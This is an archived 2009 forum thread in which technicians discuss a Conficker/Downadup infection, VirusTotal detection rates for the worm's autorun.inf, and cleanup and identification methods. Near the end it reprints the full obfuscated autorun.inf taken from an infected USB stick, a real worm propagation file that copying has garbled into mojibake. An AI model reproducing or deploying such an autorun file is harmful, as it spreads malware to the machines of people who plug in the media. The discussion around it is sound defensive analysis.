Crap AV detection results

  • Thread starter Frazer Jolly Goodfellow
  • Start date
F

Frazer Jolly Goodfellow

I've just finished cleaning up a customer PC that was riddled with malware,
including the much-publicised Downadup/Conficker worm. To confirm the
latter, I 'harvested' the autorun.inf file it deposited on a test USB
memory stick and submitted it to virustotal.com. VirusTotal reported it had
first seen my suspect file on 4-Jan-2009 and that 26/40 identified it as
malicious. I requested re-analysis to see the current status.

VirusTotal now reports 25/39 hits. Which means that after nearly three
months of it being known to the anti-malware community, more than 33% of
anti-malware packages *still* don't recognise it, including several
'household' names e.g. McAfee, AntiVir, Avast!, PCTools, PrevX. Even
Microsoft's product detected it!

The participating vendors have access to the sample files submitted to
VirusTotal and would surely have received it through other sources as well.

So why aren't we seeing close to 39/39 hits? Are their specialists *that*
overloaded? Incompetent?

If they can't even detect this malware, what trust can we have in
anti-malware products?

And where does that leave anti-malware benchmarking? Scoring close to 100%
in a benchmark but missing the bleedin' obvious in live use doesn't
re-assure me at all.
 
1

1PW

I've just finished cleaning up a customer PC that was riddled with malware,
including the much-publicized Downadup/Conficker worm. To confirm the
latter, I 'harvested' the autorun.inf file it deposited on a test USB
memory stick and submitted it to virustotal.com. VirusTotal reported it had
first seen my suspect file on 4-Jan-2009 and that 26/40 identified it as
malicious. I requested re-analysis to see the current status.

This could have been either Conficker.A or Conficker.B, given the stated
date.
VirusTotal now reports 25/39 hits. Which means that after nearly three
months of it being known to the anti-malware community, more than 33% of
anti-malware packages *still* don't recognize it, including several
'household' names e.g. McAfee, AntiVir, Avast!, PCTools, PrevX. Even
Microsoft's product detected it!

The participating vendors have access to the sample files submitted to
VirusTotal and would surely have received it through other sources as well.

So why aren't we seeing close to 39/39 hits? Are their specialists *that*
overloaded? Incompetent?

If they can't even detect this malware, what trust can we have in
anti-malware products?

And where does that leave anti-malware benchmarking? Scoring close to 100%
in a benchmark but missing the bleedin' obvious in live use doesn't
re-assure me at all.

Going back *over* 4 weeks ago, it was /then/ my understanding that the
Conficker.A, Conficker.B and Conficker.B++ worms existed in their
_basic_ form. Also I had read, at *that* time, that >300 variations of
those basic three existed. ...and now, we have their mama, Conficker.C
and many weeks for the all of these to flourish with more variants
coming from the minds of the bad folks.

I believe this problem is like none we've seen before.

Would you please post a reply with the reported identity(s) of the worm
you found?

Do you believe that most of the big named antimalware producers have
received samples of /most/ all of the strains?

If you believe you've successfully purged your customer's system, what
tool(s) did you employ to eradicate the Conficker worm? If you still
have a copy of the virustotal URL report, that would even be better.

I'm sure that many of us share in your obvious frustration.

Pete
 
F

Frazer Jolly Goodfellow

This could have been either Conficker.A or Conficker.B, given the stated
date.


Going back *over* 4 weeks ago, it was /then/ my understanding that the
Conficker.A, Conficker.B and Conficker.B++ worms existed in their
_basic_ form. Also I had read, at *that* time, that >300 variations of
those basic three existed. ...and now, we have their mama, Conficker.C
and many weeks for the all of these to flourish with more variants
coming from the minds of the bad folks.

I believe this problem is like none we've seen before.

Would you please post a reply with the reported identity(s) of the worm
you found?

Pete here are the before and after reports from VirusTotal:

File has already been analysed:
MD5: 7d9542ef7c46ed5e80c23153dd5319f2
First received: 01.04.2009 23:55:36 (CET)
Date: 03.27.2009 10:53:21 (CET) [+1D]
Results: 26/40
Permalink: analisis/0b687a1372ad6cc095f0dad3dd26198c


File autorun.inf received on 03.28.2009 15:58:19 (CET)
Current status: finished
Result: 25/39 (64.11%)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.03.28 Net-Worm.Win32.Kido!IK
AhnLab-V3 5.0.0.2 2009.03.28 Win32/Conficker.worm
AntiVir 7.9.0.129 2009.03.27 -
Antiy-AVL 2.0.3.1 2009.03.28 -
Authentium 5.1.2.4 2009.03.27 JS/AutoRun
Avast 4.8.1335.0 2009.03.27 -
AVG 8.5.0.285 2009.03.28 Worm/Generic_c.ZS
BitDefender 7.2 2009.03.28 Trojan.Autorun.AET
CAT-QuickHeal 10.00 2009.03.28 -
ClamAV 0.94.1 2009.03.28 Worm.Autorun-1838
Comodo 1087 2009.03.28 Unclassified Malware
DrWeb 4.44.0.09170 2009.03.28 Win32.HLLW.Shadow
eSafe 7.0.17.0 2009.03.27 -
eTrust-Vet 31.6.6421 2009.03.27 INF/Conficker
F-Prot 4.4.4.56 2009.03.27 JS/AutoRun
F-Secure 8.0.14470.0 2009.03.28 Worm:W32/Downaduprun.A
Fortinet 3.117.0.0 2009.03.28 -
GData 19 2009.03.28 Trojan.Autorun.AET
Ikarus T3.1.1.48.0 2009.03.28 Net-Worm.Win32.Kido
K7AntiVirus 7.10.684 2009.03.28 Trojan.BAT.Autorun.IWB
Kaspersky 7.0.0.125 2009.03.28 Net-Worm.Win32.Kido.ih
McAfee 5566 2009.03.27 -
McAfee+Artemis 5566 2009.03.27 -
McAfee-GW-Edition 6.7.6 2009.03.28 -
Microsoft 1.4502 2009.03.28 Worm:Win32/Conficker.B!inf
NOD32 3972 2009.03.28 INF/Conficker
Norman 6.00.06 2009.03.27 BAT/Autorun.IWB
nProtect 2009.1.8.0 2009.03.28 -
Panda 10.0.0.10 2009.03.27 W32/Conficker.C.worm
PCTools 4.4.2.0 2009.03.28 -
Prevx1 V2 2009.03.28 -
Rising 21.22.52.00 2009.03.28 -
Sophos 4.40.0 2009.03.28 Mal/ConfInf-A
Sunbelt 3.2.1858.2 2009.03.28 INF.Autorun (v)
Symantec 1.4.4.12 2009.03.28 W32.Downadup!autorun
TheHacker 6.3.3.8.294 2009.03.28 W32/Conficker.autorunL
TrendMicro 8.700.0.1004 2009.03.28 TROJ_DOWNAD.AD
VBA32 3.12.10.1 2009.03.27 -
ViRobot 2009.3.27.1666 2009.03.27 INF.Autorun.59288.B

Additional information
File size: 59288 bytes
MD5...: 7d9542ef7c46ed5e80c23153dd5319f2
SHA1..: f49fa573a973500d37df219d6055fd4a50f7931f
SHA256: dfc1f69b3efc968310ed8901eda055ea40fa488059a6a3763c356539820ccc3e
SHA512:
1fb7746bdff15739b2a8ff7bb52517457ac820d4bfd26efa516555db836e3ff1<BR>f605ed399aaf0d9b83a8aa9dbf4b199398fc6626e5ff0ee98a00363404b36c56
ssdeep: 1536:uvE5/VJ8m0HJnppEnANcFqAsVH8cORecS/1:ksh6pl/H8nRK<BR>
PEiD..: -
TrID..: File type identification<BR>Text - UTF-16 (LE) encoded
(66.6%)<BR>MP3 audio (33.3%)
PEInfo: -
RDS...: NSRL Reference Data Set<BR>-
packers (Authentium): Unicode
packers (F-Prot): Unicode
 
V

Virus Guy

Frazer said:
I 'harvested' the autorun.inf file it deposited on a test USB
memory stick and submitted it to virustotal.com.

The primary code-base for conficker is a .DLL file I believe.

If so, that's the file you should have sent to Virus Total.
 
F

Frazer Jolly Goodfellow

This could have been either Conficker.A or Conficker.B, given the stated
date.


Going back *over* 4 weeks ago, it was /then/ my understanding that the
Conficker.A, Conficker.B and Conficker.B++ worms existed in their
_basic_ form. Also I had read, at *that* time, that >300 variations of
those basic three existed. ...and now, we have their mama, Conficker.C
and many weeks for the all of these to flourish with more variants
coming from the minds of the bad folks.

I believe this problem is like none we've seen before.

Would you please post a reply with the reported identity(s) of the worm
you found?

Do you believe that most of the big named antimalware producers have
received samples of /most/ all of the strains?

If you believe you've successfully purged your customer's system, what
tool(s) did you employ to eradicate the Conficker worm? If you still
have a copy of the virustotal URL report, that would even be better.
Conficker was but one of the problems this system had. Initially it
displayed very obvious symptoms of a WinFixer type rogue AV infection -
banner on the desktop wallpaper and pop-ups announcing a gazillion spurious
infections - so I set MBAM onto it, followed by SuperAntispyware, Spybot
S&D and then Kaspersky AVP.

To be sure I'd got rid of the Conficker infection I used specific fix tools
from Symantec and Bit Defender. I later ran the latest Microsoft MRT.exe
and it still found 5 infected files after all of the others!

The cleanup post-infection was a challenge as well. No network access at
first, fixed by running WinsockXPfix and rebooting. Couldn't get it to
accept Service Pack 3 because of Access Denied errors - probably a defence
mechanism planted one or other items of the malware. Resetting the registry
and the file permissions per Microsoft's kb949377 did the trick -
eventually - the fix wouldn't complete because a program it depends on
(secedit.exe) was missing from the target system.

It has taken two days elapsed to clean up, mostly unattended I hasten to
add.
I'm sure that many of us share in your obvious frustration.

I'm frustrated because, whilst most of us can understand that a 'day-zero'
infector may well get through the best defences, you at least expect the
industry to be on top of the headline-grabbing ones that have been around
for weeks.
 
F

Frazer Jolly Goodfellow

The primary code-base for conficker is a .DLL file I believe.
Oh thanks for that insight. I understand that the .DLLs are randomly named,
s next time I should submit all of the .DLL files, one at a time, just in
case.
If so, that's the file you should have sent to Virus Total.
.... so the autorun.inf file planted on removable media to infect the next
PC it's plugged into isn't significant? Wouldn't it be useful if the AV
software on that PC could recognise it before it is executed?
 
1

1PW

This could have been either Conficker.A or Conficker.B, given the stated
date.

Going back *over* 4 weeks ago, it was /then/ my understanding that the
Conficker.A, Conficker.B and Conficker.B++ worms existed in their
_basic_ form. Also I had read, at *that* time, that >300 variations of
those basic three existed. ...and now, we have their mama, Conficker.C
and many weeks for the all of these to flourish with more variants
coming from the minds of the bad folks.

I believe this problem is like none we've seen before.

Would you please post a reply with the reported identity(s) of the worm
you found?

Pete here are the before and after reports from VirusTotal:

File has already been analysed:
MD5: 7d9542ef7c46ed5e80c23153dd5319f2
First received: 01.04.2009 23:55:36 (CET)
Date: 03.27.2009 10:53:21 (CET) [+1D]
Results: 26/40
Permalink: analisis/0b687a1372ad6cc095f0dad3dd26198c


File autorun.inf received on 03.28.2009 15:58:19 (CET)
Current status: finished
Result: 25/39 (64.11%)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.03.28 Net-Worm.Win32.Kido!IK
AhnLab-V3 5.0.0.2 2009.03.28 Win32/Conficker.worm
AntiVir 7.9.0.129 2009.03.27 -
Antiy-AVL 2.0.3.1 2009.03.28 -
Authentium 5.1.2.4 2009.03.27 JS/AutoRun
Avast 4.8.1335.0 2009.03.27 -
AVG 8.5.0.285 2009.03.28 Worm/Generic_c.ZS
BitDefender 7.2 2009.03.28 Trojan.Autorun.AET
CAT-QuickHeal 10.00 2009.03.28 -
ClamAV 0.94.1 2009.03.28 Worm.Autorun-1838
Comodo 1087 2009.03.28 Unclassified Malware
DrWeb 4.44.0.09170 2009.03.28 Win32.HLLW.Shadow
eSafe 7.0.17.0 2009.03.27 -
eTrust-Vet 31.6.6421 2009.03.27 INF/Conficker
F-Prot 4.4.4.56 2009.03.27 JS/AutoRun
F-Secure 8.0.14470.0 2009.03.28 Worm:W32/Downaduprun.A
Fortinet 3.117.0.0 2009.03.28 -
GData 19 2009.03.28 Trojan.Autorun.AET
Ikarus T3.1.1.48.0 2009.03.28 Net-Worm.Win32.Kido
K7AntiVirus 7.10.684 2009.03.28 Trojan.BAT.Autorun.IWB
Kaspersky 7.0.0.125 2009.03.28 Net-Worm.Win32.Kido.ih
McAfee 5566 2009.03.27 -
McAfee+Artemis 5566 2009.03.27 -
McAfee-GW-Edition 6.7.6 2009.03.28 -
Microsoft 1.4502 2009.03.28 Worm:Win32/Conficker.B!inf
NOD32 3972 2009.03.28 INF/Conficker
Norman 6.00.06 2009.03.27 BAT/Autorun.IWB
nProtect 2009.1.8.0 2009.03.28 -
Panda 10.0.0.10 2009.03.27 W32/Conficker.C.worm
PCTools 4.4.2.0 2009.03.28 -
Prevx1 V2 2009.03.28 -
Rising 21.22.52.00 2009.03.28 -
Sophos 4.40.0 2009.03.28 Mal/ConfInf-A
Sunbelt 3.2.1858.2 2009.03.28 INF.Autorun (v)
Symantec 1.4.4.12 2009.03.28 W32.Downadup!autorun
TheHacker 6.3.3.8.294 2009.03.28 W32/Conficker.autorunL
TrendMicro 8.700.0.1004 2009.03.28 TROJ_DOWNAD.AD
VBA32 3.12.10.1 2009.03.27 -
ViRobot 2009.3.27.1666 2009.03.27 INF.Autorun.59288.B

Additional information
File size: 59288 bytes
MD5...: 7d9542ef7c46ed5e80c23153dd5319f2
SHA1..: f49fa573a973500d37df219d6055fd4a50f7931f
SHA256: dfc1f69b3efc968310ed8901eda055ea40fa488059a6a3763c356539820ccc3e
SHA512:
1fb7746bdff15739b2a8ff7bb52517457ac820d4bfd26efa516555db836e3ff1<BR>f605ed399aaf0d9b83a8aa9dbf4b199398fc6626e5ff0ee98a00363404b36c56
ssdeep: 1536:uvE5/VJ8m0HJnppEnANcFqAsVH8cORecS/1:ksh6pl/H8nRK<BR>
PEiD..: -
TrID..: File type identification<BR>Text - UTF-16 (LE) encoded
(66.6%)<BR>MP3 audio (33.3%)
PEInfo: -
RDS...: NSRL Reference Data Set<BR>-
packers (Authentium): Unicode
packers (F-Prot): Unicode

This report is *so* informative as it certainly underscores your
troubles in tussling with this infestation. Unless I'm mistaken, this
Conficker is identified as /any/ of the A, B or C variants!

VG has posed a great question. However, I wonder if any of the
Confickers deletes all traces of the first/original .dll infecter file?

Thank you kindly for posting this! Much appreciated.

Pete
 
F

Frazer Jolly Goodfellow

You sent them a text file?

Why not? Most AV software will detect .BAT, .CMD and other script files
which are in text format.
Maybe sending the executable would get better results.

Which executable would that be?

The point is that it is as dangerous as .EXE file. If you plug a memory
stick with that specific file in its root directory into an unpatched PC
with autorun not disabled, it can cause that PC to become infected with a
worm that has been known to be in the wild for three months or more. And
33% of VirusTotal's chosen sample of representative AV programs that
purport to protect PCs from such infectors *don't detect it*.
 
F

Frazer Jolly Goodfellow

Right Virus Guy!

Funny how many did detect this malicious text file as vaguely
confickerlike.

A PC can become infected via the autorun.inf file being present on a USB
memory stick that is plugged into the PC. So the AV software needs to
detect that file, which is the primary infector. The randomly-named .DLL
file(s) come later - by which time it's too late!
 
F

FromTheRafters

Frazer Jolly Goodfellow said:
I've just finished cleaning up a customer PC that was riddled with
malware,
including the much-publicised Downadup/Conficker worm. To confirm the
latter, I 'harvested' the autorun.inf file it deposited on a test USB
memory stick and submitted it to virustotal.com.

You sent them a text file?

Maybe sending the executable would get better results.
 
F

FromTheRafters

Frazer Jolly Goodfellow said:
Oh thanks for that insight. I understand that the .DLLs are randomly
named,
s next time I should submit all of the .DLL files, one at a time, just
in
case.

... so the autorun.inf file planted on removable media to infect the
next
PC it's plugged into isn't significant? Wouldn't it be useful if the
AV
software on that PC could recognise it before it is executed?

It should be referred to in the affected autorun.inf file.
 
F

FromTheRafters

Virus Guy said:
The primary code-base for conficker is a .DLL file I believe.

If so, that's the file you should have sent to Virus Total.

Right Virus Guy!

Funny how many did detect this malicious text file as vaguely
confickerlike.
 
F

Frazer Jolly Goodfellow

It should be referred to in the affected autorun.inf file.

Heavily obfuscated I fear - here's a sample from the start of the file:

;½¼D‰fIJɲuÀŒ×ü™ÂG¬¾ŠÌ·rkXïîOVüjÅ fŸAL* 

*


;fb/ 
;_ÑÃoÈÞµÃKkA¢PaŸÃTªx¹uerËfÂJ•ojP½ãFf¹wu¨iÀgH…bêmKªZHyFL/
_[ *  TdkjJufXACQXwTrqdYPpjbSC]_


Kf’Z  
;  ÇÂöÃerªK¯D¥øoJUqHK­¦emTiv×N¹q÷CÂIogå×f¡cìD¾Þcà 
*ajzLmMmVuIndpuy =lcH*
* *QPDdnsHCDPoyNqFrWqCPwdLwE = EYhdLWGyLTaLO  

/KQKpTKLgSQvADhzMNrhSy/*=  VZqYYrMDNyVUqfoNwyaUdSitL

;YBQ¯HSŸoÂbOÄžÂbèErwu£ïmÅ“hHk¤âFyú€b™®ièdÛZorf´Nv•Æ
;**XÂÚOq¥Ì÷ÃÃŒk‡ÒÖÃàMSv‚­qhÃHh
_XQQT/=KXpdSzJH

; **XVkPøEðAƒïoÙzúl¨GOÛ¥boeS

;í¦Ÿ‚V†è§ivp›åòÂÉvüƒöÞÌ®¨zìdÃ¥E 
;_ TNoAŸê›ÃquOëLGbÿEðvàÞ‚DYiÕXïäjBºVw¨j‰üRÃ*
 
F

FromTheRafters

Frazer Jolly Goodfellow said:
A PC can become infected via the autorun.inf file being present on a
USB
memory stick that is plugged into the PC.

Is the "autorun" and/or "autoplay" actually broken, or is it only being
abused?

If it is being abused, it is a method to get the worm body to execute on
the machine. If it is broken, then this is an exploit vector (which I am
not convinced is the case here) and the worm body can be fetched and
executed by the compromised process.
So the AV software needs to detect that file, which is the primary
infector.

It is an ingress vector and does need to be detected. If it is an abuse
of the autorun or autoplay function, it can not necessarily *identify*
the malware - you need the executable for that.
The randomly-named .DLL
file(s) come later - by which time it's too late!

The DLL *is* the worm body.
 
V

Virus Guy

Frazer said:
I understand that the .DLLs are randomly named, next time I should
submit all of the .DLL files, one at a time, just in case.

Yes, it will be randomly named (which should be some-what easy to pick
out, for a human anyways). It will be located in either the System32
directory, program files or the user's temporary files folder.

One characteristic is that it will have the same date-stamp as the
host's kernel32.dll file.

So find kernel32.dll, look at it's date (not sure if it's created or
modified date you want) then seach the entire system (including hidden
and system files) for all .dll files with the same date. Then visually
scan the list and look for a "randomly-named" file. The bone-heads that
wrote a write-up I was reading about it doesn't mention the typical size
for this file, which would help to narrow it down.

http://mtc.sri.com/Conficker/addendumC/index.html

The file will have it's write and delete privileges set so that it can't
be deleted. Besides some registry entries that it sets (some, most or
all of which it doesn't seem to use), the only file it relies on is
itself - no accessory files. It doesn't even modify any system files
(but it does alter the memory images of some specific system files).
... so the autorun.inf file planted on removable media to infect
the next PC it's plugged into isn't significant?

The autorun.inf file is a text file. Presumably it's only a few lines
in length and contains no personally-identifiable information. If so,
please post it here. It will contain the name of the executable that
installs the DLL onto the system, so look for that file as well (if this
was a USB memory stick then it should also be on the stick). Submit
that file to Virus Total and report back the results.
Wouldn't it be useful if the AV software on that PC could
recognise it before it is executed?

I'm not sure how different AV programs are positioned in terms of
interception ability when it comes to files that are launched via
autorun.inf on removable media.
 
F

FromTheRafters

Frazer Jolly Goodfellow said:
Why not? Most AV software will detect .BAT, .CMD and other script
files
which are in text format.

Indeed. That file is a little like the old "autoexec.bat" file. Consider
an entry like "@hrur4ttn.exe" in that file. Sure, it would be good to
detect such an entry, but you wouldn't really know much about the
malware itself without analyzing the actual "hrur4ttn.exe" file.
Which executable would that be?

The one the information file attempts to execute when autorun is
enabled - or the one it attempts to trick the user into executing by
making it look like a simple "open" action.
The point is that it is as dangerous as .EXE file. If you plug a
memory
stick with that specific file in its root directory into an unpatched
PC

It is not a patch, it is a configuration option. Sort of like having the
option to not boot from a floppy to avoid boot sector infector
propagation.
with autorun not disabled, it can cause that PC to become infected
with a
worm that has been known to be in the wild for three months or more.
And
33% of VirusTotal's chosen sample of representative AV programs that
purport to protect PCs from such infectors *don't detect it*.

The text file?
 
V

Virus Guy

Frazer said:
Heavily obfuscated I fear - here's a sample from the start of the
file:

Did the material you posted come from the actual autorun.inf file, or is
it part of the file that is mentioned _in_ the autorun.inf file?

Please post the contents of the inf file here, then submit the file that
is launched from the inf file to virus total and report back the
results.
 
V

Virus Guy

FromTheRafters said:
The DLL *is* the worm body.

The file that is launched from the inf file may not be the actual
conficker .DLL file. It may be a loader that goes out to the internet
and obtains the actual conficker file.

This loader file could even be a specially crafted PDF file or a HTTL
URL for all we know.
 
F

Frazer Jolly Goodfellow

Did the material you posted come from the actual autorun.inf file, or is
it part of the file that is mentioned _in_ the autorun.inf file?

Please post the contents of the inf file here, then submit the file that
is launched from the inf file to virus total and report back the
results.

I've pasted the complete contents of the autorun.inf file below. I don't
know what is launched as a consequence of its execution because the text is
so obfuscated.

;½¼D‰fIJɲuÀŒ×ü™ÂG¬¾ŠÌ·rkXïîOVüjÅ fŸAL* 

*


;fb/ 
;_ÑÃoÈÞµÃKkA¢PaŸÃTªx¹uerËfÂJ•ojP½ãFf¹wu¨iÀgH…bêmKªZHyFL/
_[ *  TdkjJufXACQXwTrqdYPpjbSC]_


Kf’Z  
;  ÇÂöÃerªK¯D¥øoJUqHK­¦emTiv×N¹q÷CÂIogå×f¡cìD¾Þcà 
*ajzLmMmVuIndpuy =lcH*
* *QPDdnsHCDPoyNqFrWqCPwdLwE = EYhdLWGyLTaLO  

/KQKpTKLgSQvADhzMNrhSy/*=  VZqYYrMDNyVUqfoNwyaUdSitL

;YBQ¯HSŸoÂbOÄžÂbèErwu£ïmÅ“hHk¤âFyú€b™®ièdÛZorf´Nv•Æ
;**XÂÚOq¥Ì÷ÃÃŒk‡ÒÖÃàMSv‚­qhÃHh
_XQQT/=KXpdSzJH

; **XVkPøEðAƒïoÙzúl¨GOÛ¥boeS

;í¦Ÿ‚V†è§ivp›åòÂÉvüƒöÞÌ®¨zìdÃ¥E 
;_ TNoAŸê›ÃquOëLGbÿEðvàÞ‚DYiÕXïäjBºVw¨j‰üRÃ*



; RÅ ÃÖHµCAqVrÃppÜ­†ËÑ´h³nÆ’fm¼gjAÇKkÂRT›´Wtâ€XËUBu*
 *  FfWcviZFJ=kMHcLuKMpxbeHUvVLDm


m¿¢DÌðØvîÃÊX˜ŠÜ•òHÃeÇwýŸœeVlÃŒDÖSVnnªiPgëpr¿uhªp¾U¢qo
;ÆfÇUág¤héaÚÃuÂ¥QEP„ÚvA³“oï

*Oy/= X
;*bÊU¦æé£I±õ‡ÌlPTðp¸ïðšâŽñÕA†ÄÄxz*





 
_ * 
FibxDcy=  vXKaLimbaYwSjV

;   
;* /ONVç×ëiWwnESWieà  _
;ªª»áÃîV¦UwÀœúÚëQcpB–ìáEuæ***
;_Æ’dEMFMkHVdÃzE_ 
/hNkoIumHmuk/= _YeTJ*

;Ã¥aÛËtD—øÃehÄ

;  VaŠjÛmñKDrÖÈq¶s€€­ËÒzúyÒoF*
;  O¦åxÅ“lhsúBsRß²rFC±e‚™Z—ëåÔ°tŒ ƒ’coÂGaAÒønýêcúÂ*
  
; ÃÞQUËœBq·o°–fYÓFvÃ’VauÊÌCSÈXHRMÛ×­Cƒ­B¨W÷jP 

/ 
 lErlVdHCsqyQpCGb=lADRVhXyrbrvwbR

;NùØflÓãNBþ·Çf“Hž




GDopXKSdiq *= nbGmMXLwZsDW/*

; *
;*  


/*V= b 
* /
; _ 
; ßmÉq¤PepUPÓQtyD‰J˜m v€zè

;  *_Mk¥ËÅI€/  
;ãBýJ—êDKù¯¢«iÂhYtjtm·OÄyä¸ébH½MErP¾DÃz·Ãµßpn/

 /
EbaZlTYcBbgsuNyHA=MUt/ 
 _
; 

* 

;LzÃBGoljB
;MRṙ÷OMpEM™Îx¡®‡yæTeßG*
_*

*  SwkgHtTA *=*
YhuluEEVXrwHxcIMCAemHn
;©Iiþ½PpkégYÈœ* 

;***—ÈÀPæBˆtMÑÆÊV
 


 *

ARI=UehzEyMvadlDxIRdDGRluR
;*ÕÈ“Ôu»Dç·yò°VW½_* 
;áS½ÚÂ×…ZÂBÖü
;Ãbj˜˜ŠlI¹DÃbxKÅ’yÂP*

; *
_/
; ÙÃùSLCŸX_


[*/MUGFeaRSXVUNZU]
;‚«mKÂÿ¥×ãLcK¡†³ÂªCAÞcYCãQíd•Ê»ÃDÕK*
* 
; qëAweÜEd°çöïlWO¦Buqûo•QµL/* 

;  Yâ„¢sŸLóÆÃÂ¥ymLÅ¡u
;kLñEÃû¦GF¸Â©ÖiÚbÂD®ù/

;*NSnkITpíe 
HcI= eZKabCjLwlSblRL/*
_
svCQKf /=TlyzJYZN
_
* HDmtLfc= rTvWotHiTxVObR




**_*/Svæ×ÀdÈúÉn…ÆdìÈ®KÃáÞ©yqÊÃP•äbn¸sâ€k
;
  sSg *=*B

 njØ‘D¹ílXmAdZäçMMn—oˆio­¸A®uÃŽÂfö—oBSDq­S£ÔMÊ÷uE‰KqE¶äCZÛp½EYW®™üM
*

;yWëZ 
; _ âéÙØðvƒÉÃpoÜÜXhI€b
;*_
;_*àéñ÷îPx´§ðe­UîÃN·mÂϚNcØ¢eIb±pØkt¾_
_DkbRAsIkb*=lKIhzuZmKMAbuzuMdWPWFx

*JpGusPMHYfA_=*  JVcourlC/

;ÃiËœrliXoðIjµšA 
/*

 *
_ 

  YUTvcKNulgVNkTbcNhN=HzVpnAQK/
_

; /*lhAkÂKö_
 
;qSV„E­AƛէPp¦èêxÚQ¯†sKqBÀÃÃ…ÃgðÑFm


 uVP/ =*Sge

/OpdzL=tAVAcKliVTTwTmznICEilcGAE 
;*¿jSCIÃÅ“JÊœ…llòpM¼vÃ…¹ÕFM½¥´IGq€­ñrÆ’ÂÃ’FmUnÅ HÄZs¿¾PWvUækIPIÚ¯kvÓ/_/
_
*gHJcrnbHrTtZLyPyKLmsrZZ*= UEBGFMaiHpfDTMtUXZzjOcr
_ 
; EDëNgUxXAID¬×Ëø•ŸÂvÿ¢ìku
 

;NrEœÊaäeRNcßwû«JÙQaiCA§nv / **
/
;  _rHn—JlCX‹ÂtpKïK˜˜yeFM³T†¡™åBhï
 *exqVMWbmM* =/KNtKqLIrGm
/


* *



 _yìlqô°í…wö‰mmsY€€åzéWqlâ„¢MKPqHhvjKDjGQýµtFgÃuÆy *


_mjaTnOlHKTMXrcEPE= pB*_*


* 
;/ÛúNMP§ioMÉ™Cp×½AW Ùuûõül‹Ì¹µñb*__*


 /HKACUUYMdJEgNuTa=dDoAbKuxgHBrv
_
/ funNYQJZbDUlxuivrKj =hsxzuRvLSAtARdPCLTgslooQ*

 _
;*î„Z¼Kîj¾Ã×tq¹qûðCÃózxےS//

 SbAkYmqj= NmMNjYyiM 
; /



; P‹wºhqÛtQørnùcÕUfÅ’YRÆàavvÃ…BQk²qÙkrßq·Kw¸afw

*

;/* **

_**uqwQlFFFuoSlCWsOmjxzc/=kEryqRHuFFltvrpHImLn 




aeBzPqtJ/=Vm/  
[jyFPhb]
  _

; tfP¿¾×FhoæVr¡SIhȾ
** 
*_
/ *
;dçfxÉ’£gðžTát‘KÖšedxE gåLQNQmNG¢ /_

JnAbQXPxdFGMQlA/*_=hthUTgGdKclFvzZzTS/ *


;gâ„¢TÂY·ºOì


pwIoQiCkVDktrkgDApLXPy=QUNwLnjqXTJIVJpxHTSHaVCVi
;*ɶk×q½ÃuYnfB
;*/ YY¬t/
;_U»lm§ÙòÿQq­Ãb¶eLtZÅ“ÃV¸SÂeíHkgHnýw«Þ€±aH zTùŸqØG×_
/*GKTPFbubWDNaxEKIeMdThK /=ZCWMJh 



;/bênqqبnMqæ´ÂZEm¾
;épfþQXYqWÔp»ãA…ûb¬ /
*_/

/tdqRWRUjTxrjk=wHAOFvaJCLBKKHtf*

; *

*
_/
*
HlzdxIQsfh_=**YtIFTCFqOBOFtCgAwPL
;« âi’ZªC¹šCW®ggSÜÞñPuXhJtFITH×NuPKMtñ³hÃKsÿvu³xG
* 
; _ Dúò—WÅ XNÑQ³®oÃÃ…t½Üi¸Sm
* 
*

;  

; AãUȸ­w¥€dCTëu 

**WOSAjJEKrDduvpCtjcszAwT =JIXFIuBRhH 

;
;*¦Åno…²¨ŒpÙIPäòQîV×T˜æ‘q‹ùu‹WxúOæú¼RhZXÑíZb 
_
;*¼mBg›I†WìXQ

; ÙÅóÃä

*/_*/iqSTxJiYHraLAWEdXMuJxQ = pcF*

;**

;/ RæÚòPRøÈt‹rŠônd
; ¹tmÂgEÂqØKFS¼IÄE×b­·¾QxLãtßH¶°KT‹ÃVkj

;/ *


_ oxMHaAWaaApvh * = OcBLpZz_

[ZYGEbWkuyUXSCvhnvmMXn]**/
; …“C¨TgD³ÂîÂg•ã½ïË—eˆÃMŸÆLAAlkKhQJÚ
/
;ÃlwyUiAvSälKMOxd¶p·F«ÃHoãXQH¸X’÷GC÷šnj 
_

;_
_


*/**FRwSL *=*CvhXem


* 
/oWoEHAXTROocK** = ofufjoBmcHJV

;___


*BDK =**UfvBmImeNGYKZkGBaxxFgv 
; /*
;*G“rIMRÃ×UóÖY—b

BPRzHgwFttpyp =_mZJ
;/

**


 to=* OLxhQBnYWPbxzPCyGPp 
_MlqlNhptvZyACRFBmCh =
JuyVVxLpFvWqrLX

;X®’åWIí«rœÔ‰Æ
CVkihnxgjU_  =aTCQdMPqiaALzwYWht 

; Ã  __
;J¥ýÈTÞeUSËVŽVdGÃòUÉsËœAA†˜HBß‹w¤vÿÙßZQÄwF¸©uÂd__ 

 *
 * iJYhDcuFiysmjuJDTIrH *= IrXXSEUIWaF 

;//_ 
CZzGfhC=ssIwjW
;  /*





 
  mVSBafvZnkDFgoH_=JPpufaYKpAd /


*
;/ “£€ÂÃŽs½UosÚÆCWH÷Ac뤯AFDL

rYmTRHosrHViCjybAQU/ *_=hgrPDlouqVJpXOWtzxgTQFQXQ
;*
*fpÕ“yäÛíhmY—U«n÷pMa©†RxröŸÂŠ‹Ìy¢ºq¼m¿*_*
/
;/fÃYlyxyIôqœˆRH¬³šjrp´ßDl€llWhbùRTyȔpp•ÂZiÂÑåCÓË
;
*jVM¡Ôz“çâFuAºZt¹SfxÆ’VŽd¦wÂwÃX£MeºáKSPcÃBOL‹‘/
*

;áÄG侧GotEw¤obKÃÿÌqc©YhXMfó¡…/

/  kRCV /=*_sEfZFenvGQPXe *_
;_ý­¯Ì¼ebPÒûiJîkJÃ¥C£BÂbëa* _


;žoQh¼³¯
;/__€WÇñš’D†aλ¶c¦ ù½Ãazò
_SH /=*   JrXonjtrCzaWPg
 


; _
;X¾r…hðâ€yÊÃGñRÎÔGà  
 

* *[jQrGSCaUUaeq
;*zEÈg¸TnegndXe“gm‘SkŸßOkk»ŒRhã

*

*


_MKsAxIzkpt= UTRRAXUCSEuYnpRjio 


***nZHOuBOPBuyWECREDg = jRno
;*  hR„Àu“TNüyK–ƒÑXDy *
; *QGJ¹UÃ…bCtJåðodFΦwL†EÀ



;ïÿ»H

_[cSEtyH]
*
;*¿¦n‡ýuufiY¼¶MþA´oýe‹RCÇmZl‘MxÅ¡mOWc°ŒOúFJ«NJZiBE§môNшÂKPyà 
;  **NÊ£Pâ€Ã˜


*NUâ€Ã¤OØ«ºH‘kPiùJ¢¼çGÚkAL›­NYXm²wßщ¸ýÔr«cŽ***
_ 

